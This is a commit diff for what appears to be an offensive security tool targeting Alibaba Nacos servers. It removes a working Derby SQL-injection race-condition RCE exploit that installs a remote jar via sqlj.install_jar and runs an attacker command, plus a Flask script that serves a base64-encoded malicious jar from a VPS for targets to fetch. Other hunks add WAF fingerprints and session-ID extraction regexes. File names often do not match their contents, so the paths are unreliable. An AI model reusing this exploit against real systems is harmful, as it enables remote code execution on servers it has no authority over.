update 1.7.4

Author: qiwentaidi

core/exp/nacos/derby_sql_rce.go

@@ -0,0 +1,10 @@
+package nacos
+
+import (
+	"testing"
+)
+
+func TestXxx(t *testing.T) {
+	// result := checkVuln("http://172.16.81.139:8848/nacos/", nil, http.DefaultClient)
+	// fmt.Printf("result: %v\n", result)
+}

core/exp/nacos/derby_test.go

@@ -1,15 +1,9 @@
 package nacos
 
 import (
-	"bytes"
-	"context"
 	"fmt"
-	"mime/multipart"
 	"net/http"
-	"net/url"
 	"slack-wails/lib/clients"
-	"slack-wails/lib/gologger"
-	"slack-wails/lib/util"
 	"strings"
 )
 
@@ -72,55 +66,3 @@ func CVE_2021_29442(url string, client *http.Client) string {
 	}
 	return result
 }
-
-func DerbySqljinstalljarRCE(ctx context.Context, headers, target, command, service string, client *http.Client) string {
-	var times int
-	removalURL := target + "v1/cs/ops/data/removal"
-	derbyURL := target + "v1/cs/ops/derby"
-	var tempHeader []string
-	if headers != "" && strings.Contains(headers, ":") {
-		tempHeader = strings.Split(headers, ":")
-	}
-	for i := 0; i < 1<<31-1; i++ {
-		id := util.RandomStr(8)
-		postSQL := fmt.Sprintf(
-			`CALL sqlj.install_jar('%s', 'NACOS.%s', 0)
-   CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.%s')
-   CREATE FUNCTION S_EXAMPLE_%s( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
-   `, service, id, id, id)
-		getSQL := fmt.Sprintf("select * from (select count(*) as b, S_EXAMPLE_%s('%s') as a from config_info) tmp /*ROWS FETCH NEXT*/", id, command)
-		body := &bytes.Buffer{}
-		writer := multipart.NewWriter(body)
-		part, err := writer.CreateFormFile("file", "postSql")
-		if err != nil {
-			gologger.Debug(ctx, "Failed to create form file: "+err.Error())
-		}
-		_, err = part.Write([]byte(postSQL))
-		if err != nil {
-			gologger.Debug(ctx, "Failed to write to form file: "+err.Error())
-		}
-		writer.Close()
-		header := map[string]string{
-			"Content-Type": writer.FormDataContentType(),
-		}
-		if len(tempHeader) >= 2 {
-			header[tempHeader[0]] = tempHeader[1]
-		}
-		_, respBody, err := clients.NewRequest("POST", removalURL, header, body, 10, true, client)
-		if err != nil {
-			gologger.Debug(ctx, err)
-		}
-		times++
-		if times > 1000 {
-			return "不存在该漏洞"
-		}
-		if strings.Contains(string(respBody), "\"code\":200") {
-			_, getBody, err := clients.NewSimpleGetRequest(derbyURL+"?sql="+url.QueryEscape(getSQL), client)
-			if err != nil {
-				gologger.Debug(ctx, "Failed to read response body: "+err.Error())
-			}
-			return string(getBody)
-		}
-	}
-	return "不存在该漏洞"
-}

core/exp/nacos/nacos.go

@@ -8,27 +8,28 @@ import (
 
 var (
 	WAFs = map[string][]string{
-		"sanfor-shield":  {".sangfordns.com"},
-		"360panyun":      {".360panyun.com"},
-		"baiduyun":       {".yunjiasu-cdn.net"},
-		"chuangyudun":    {".365cyd.cn", ".cyudun.net", ".365cyd.net"},
-		"knownsec":       {".jiashule.com", ".jiasule.org"},
-		"huaweicloud":    {".huaweicloudwaf.com"},
-		"xinliuyun":      {".ngaagslb.cn"},
-		"chinacache":     {".chinacache.net", ".ccgslb.net", ".chinacache.com"},
-		"nscloudwaf":     {".nscloudwaf.com"},
-		"wangsu":         {".wsssec.com", ".lxdns.com", ".wscdns.com", ".cdn20.com", ".cdn30.com", ".ourplat.net", ".wsdvs.com", ".wsglb0.com", ".wswebcdn.com", ".wswebpic.com", ".wsssec.com", ".wscloudcdn.com", ".mwcloudcdn.com", ".chinanetcenter.com"},
-		"qianxin":        {".360safedns.com", ".360cloudwaf.com", ".360wzb.com", ".qaxcloudwaf.com"},
-		"baiduyunjiasu":  {".yunjiasu-cdn.net"},
-		"anquanbao":      {".anquanbao.net", ".anquanbao.com"},
-		"aliyun":         {"kunlun", "aliyunddos", "aliyunwaf", "aligaofang", "aliyundunwaf", ".yundunwaf2.com", ".yundunwaf1.com"},
-		"xuanwudun":      {".saaswaf.com", ".dbappwaf.cn"},
-		"yundun":         {".hwwsdns.cn", ".yunduncname.com"},
-		"knownsec-ns":    {".jiasule.net"},
-		"baiduyunjiasue": {".ns.yunjiasu.com"},
-		"cloudflare":     {".ns.cloudflare.com"},
-		"edns":           {".iidns.com"},
-		"ksyun":          {".ksyunwaf.com"},
+		"sanfor-shield":       {".sangfordns.com"},
+		"360panyun":           {".360panyun.com"},
+		"baiduyun":            {".yunjiasu-cdn.net"},
+		"chuangyudun":         {".365cyd.cn", ".cyudun.net", ".365cyd.net"},
+		"knownsec":            {".jiashule.com", ".jiasule.org"},
+		"huaweicloud":         {".huaweicloudwaf.com"},
+		"xinliuyun":           {".ngaagslb.cn"},
+		"chinacache":          {".chinacache.net", ".ccgslb.net", ".chinacache.com"},
+		"nscloudwaf":          {".nscloudwaf.com"},
+		"wangsu":              {".wsssec.com", ".lxdns.com", ".wscdns.com", ".cdn20.com", ".cdn30.com", ".ourplat.net", ".wsdvs.com", ".wsglb0.com", ".wswebcdn.com", ".wswebpic.com", ".wsssec.com", ".wscloudcdn.com", ".mwcloudcdn.com", ".chinanetcenter.com"},
+		"qianxin":             {".360safedns.com", ".360cloudwaf.com", ".360wzb.com", ".qaxcloudwaf.com"},
+		"baiduyunjiasu":       {".yunjiasu-cdn.net"},
+		"anquanbao":           {".anquanbao.net", ".anquanbao.com"},
+		"aliyun":              {"kunlun", "aliyunddos", "aliyunwaf", "aligaofang", "aliyundunwaf", ".yundunwaf2.com", ".yundunwaf1.com"},
+		"xuanwudun":           {".saaswaf.com", ".dbappwaf.cn"},
+		"yundun":              {".hwwsdns.cn", ".yunduncname.com"},
+		"knownsec-ns":         {".jiasule.net"},
+		"baiduyunjiasue":      {".ns.yunjiasu.com"},
+		"cloudflare":          {".ns.cloudflare.com"},
+		"edns":                {".iidns.com"},
+		"ksyun":               {".ksyunwaf.com"},
+		"jdcloud-star-shield": {".cloud-scdn.com"},
 	}
 )
 

core/waf/waf.go

@@ -77,6 +77,65 @@ func NewNucleiEngine(ctx context.Context, proxy clients.Proxy, o structs.NucleiO
 	defer ne.Close()
 }
 
+// func NewThreadSafeNucleiEngine(ctx context.Context, proxy clients.Proxy, o structs.NucleiOption) {
+// 	if o.SkipNucleiWithoutTags && len(o.Tags) == 0 {
+// 		gologger.Info(ctx, fmt.Sprintf("[nuclei] %s does not have tags, scan skipped", o.URL))
+// 		return
+// 	}
+// 	options := []nuclei.NucleiSDKOptions{
+// 		nuclei.DisableUpdateCheck(), // -duc
+// 	}
+// 	// 判断是使用指定poc文件还是根据标签
+// 	if len(o.TemplateFile) == 0 {
+// 		options = append(options, nuclei.WithTemplatesOrWorkflows(nuclei.TemplateSources{
+// 			Templates: o.TemplateFolders,
+// 		}))
+// 		options = append(options, nuclei.WithTemplateFilters(nuclei.TemplateFilters{
+// 			Tags: o.Tags,
+// 		}))
+// 	} else {
+// 		// 指定poc文件的时候就要删除tags标签
+// 		options = append(options, nuclei.WithTemplatesOrWorkflows(nuclei.TemplateSources{
+// 			Templates: o.TemplateFile,
+// 		}))
+// 	}
+// 	var proxys string
+// 	if proxy.Enabled {
+// 		proxys = fmt.Sprintf("%s://%s:%s@%s:%d", proxy.Mode, proxy.Username, proxy.Password, proxy.Address, proxy.Port)
+// 		options = append(options, nuclei.WithProxy([]string{proxys}, false)) // -proxy
+// 	}
+// 	ne, err := nuclei.NewThreadSafeNucleiEngineCtx(context.Background(), options...)
+// 	if err != nil {
+// 		gologger.Error(ctx, fmt.Sprintf("nuclei init engine err: %v", err))
+// 		return
+// 	}
+// 	// load targets and optionally probe non http/https targets
+// 	gologger.Info(ctx, fmt.Sprintf("[nuclei] check vuln: %s", o.URL))
+// 	ne.ExecuteNucleiWithOptsCtx(context.Background(), []string{o.URL}, options...)
+// 	ne.GlobalResultCallback(func(event *output.ResultEvent) {
+// 		gologger.Success(ctx, fmt.Sprintf("[%s] [%s] %s", event.TemplateID, event.Info.SeverityHolder.Severity.String(), event.Matched))
+// 		var reference string
+// 		if event.Info.Reference != nil && !event.Info.Reference.IsEmpty() {
+// 			reference = strings.Join(event.Info.Reference.ToSlice(), ",")
+// 		}
+// 		runtime.EventsEmit(ctx, "nucleiResult", structs.VulnerabilityInfo{
+// 			ID:           event.TemplateID,
+// 			Name:         event.Info.Name,
+// 			Description:  event.Info.Description,
+// 			Reference:    reference,
+// 			URL:          showMatched(event),
+// 			Request:      showRequest(event),
+// 			Response:     showResponse(event),
+// 			ResponseTime: limitDecimalPlaces(event.ResponseTime),
+// 			Extract:      strings.Join(event.ExtractedResults, " | "),
+// 			Type:         strings.ToUpper(event.Type),
+// 			Severity:     strings.ToUpper(event.Info.SeverityHolder.Severity.String()),
+// 		})
+// 	})
+
+// 	defer ne.Close()
+// }
+
 func showMatched(event *output.ResultEvent) string {
 	if event.Matched != "" {
 		return event.Matched

core/webscan/callnuclei.go

@@ -23,8 +23,8 @@
             <el-col :span="14">
                 <el-form-item label="目标:">
                     <div class="textarea-container">
-                        <el-input v-model="form.url" type="textarea" placeholder="请输入URL根路径" :rows="5" resize="none"
-                            class="custom-textarea"></el-input>
+                        <el-input v-model="form.url" type="textarea" placeholder="请输入URL根路径" 
+                            :rows="5" resize="none"></el-input>
                         <div class="action-area">
                             <el-button :icon="Upload" size="small" @click="uploadFile">Upload</el-button>
                         </div>
@@ -35,7 +35,7 @@
                 <el-form-item label="密码:">
                     <div class="textarea-container">
                         <el-input v-model="form.passwordList" type="textarea" :rows="5" resize="none"
-                            placeholder="请输入密码列表" class="custom-textarea"></el-input>
+                            placeholder="请输入密码列表"></el-input>
                         <div class="action-area">
                             <el-button :icon="Close" circle size="small" @click="form.passwordList = ''"></el-button>
                         </div>

frontend/src/assets/icon/alibaba.svg

@@ -8,39 +8,12 @@ const form = reactive({
     username: "qioxzcio",
     password: "Aoioxzcoio123.",
     command: "whoami",
-    service: "",
     header: "",
     content: "",
     selectVulnerability: 0
 })
 
 
-function onChange() {
-    if (form.selectVulnerability == 3) {
-        form.content = `请复制下面脚本到VPS上启动，需要修改host和port端口和安装flask、requests的依赖
-
-import base64
-from flask import Flask, send_file,Response
-import config
-
-payload = b'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'
-
-app = Flask(__name__)
-
-
-@app.route('/download')
-def download_file():
-    data = base64.b64decode(payload)
-    response = Response(data, mimetype="application/octet-stream")
-    return response
-
-if __name__ == '__main__':
-    app.run(host='192.168.9.128', port='5000')`
-    } else {
-        form.content = ""
-    } 
-}
-
 const vulnerabilityGroup = [
     {
         name: "CVE-2021-29441 STEP 1 任意用户添加",
@@ -54,24 +27,15 @@ const vulnerabilityGroup = [
         name: "CVE-2021-29442 Derby SQL注入",
         value: 2
     },
-    {
-        name: "Derby SQLi 条件竞争 RCE",
-        value: 3
-    },
+    // {
+    //     name: "Derby SQLi 条件竞争 RCE",
+    //     value: 3
+    // },
 ]
 
 async function useVulnerability() {
     form.url = AddRightSubString(form.url, "/")
-    if (!form.service.endsWith("/")) {
-        form.service += "/download"
-    } else {
-        form.service += "download"
-    }
-    if (form.selectVulnerability == 3 && !form.service) {
-        ElMessage.warning("请输入服务端地址!")
-        return   
-    }
-    form.content = await AlibabaNacos(form.url,form.header ,form.selectVulnerability, form.username, form.password, form.command, form.service, getProxy())
+    form.content = await AlibabaNacos(form.url,form.header ,form.selectVulnerability, form.username, form.password, form.command, "", getProxy())
 }
 </script>
 
@@ -81,7 +45,7 @@ async function useVulnerability() {
             <div class="head">
                 <el-input v-model="form.url" placeholder="请输入Nacos主页路径，例如 https://192.168.1.1/nacos/">
                     <template #prepend>
-                        <el-select style="width: 300px;" placeholder="请选择漏洞" v-model="form.selectVulnerability" @change="onChange">
+                        <el-select style="width: 300px;" placeholder="请选择漏洞" v-model="form.selectVulnerability">
                             <el-option v-for="vulnerability in vulnerabilityGroup" :value="vulnerability.value"
                                 :label="vulnerability.name" />
                         </el-select>
@@ -109,18 +73,6 @@ async function useVulnerability() {
                 </template>
             </el-input>
         </el-form-item>
-        <el-form-item v-show="form.selectVulnerability == 3">
-            <el-input v-model="form.service" style="width: 50%;">
-                <template #prepend>
-                    Service:
-                </template>
-            </el-input>
-            <el-input v-model="form.command" style="width: 50%;">
-                <template #prepend>
-                    CMD:
-                </template>
-            </el-input>
-        </el-form-item>
     </el-form>
     <pre class="pretty-response" style="height: 63vh;"><code>{{ form.content }}</code></pre>
 </template>

frontend/src/assets/icon/extract.svg

@@ -58,7 +58,7 @@ const Logger = reactive({
     length: 100, // 日志显示条数
 })
 
-const LOCAL_VERSION = "1.7.3"
+const LOCAL_VERSION = "1.7.4"
 
 const Language = ref("zh")
 const Theme = ref(false)

frontend/src/components/Exp/Hikvision.vue

@@ -136,9 +136,10 @@ export interface PocDetail {
 
 
 export interface TablePane {
-    title: string
     name: string
     content: string
+    rowsCount: number
+    matchedType: string
 }
 
 export interface DatabaseConnection {

frontend/src/components/Exp/Nacos.vue

@@ -75,4 +75,9 @@ export function validateWebscan(input: string) {
 
 export const regexpPhone = /(13[0-9]|14[01456879]|15[0-35-9]|16[2567]|17[0-8]|18[0-9]|19[0-35-9])\d{8}/g;
 export const regexpIdCard = /[1-9]\d{5}(19|20)\d{2}(0[1-9]|1[012])(0[1-9]|[12]\d|3[01])\d{3}[0-9Xx]/g;
-export const regexpAKSK = /access/g;
+export const regexpAKSK = /access/g;
+export const regexAlibabaDruidWebURI = /(?<="URI":")[^"]+/g;
+
+export const regexAlibabaDruidWebSession = /(?<="SESSIONID":")[^"]+/g;
+export const regexURL = /https?:\/\/[^\s/$.?#].[^\s]*/g;
+

frontend/src/global/index.ts

@@ -324,12 +324,6 @@ html {
   width: 100%;
 }
 
-.custom-textarea {
-  width: 100%;
-  padding-right: 50px;
-  /* Space for the action area */
-}
-
 .action-area {
   position: absolute;
   bottom: 10px;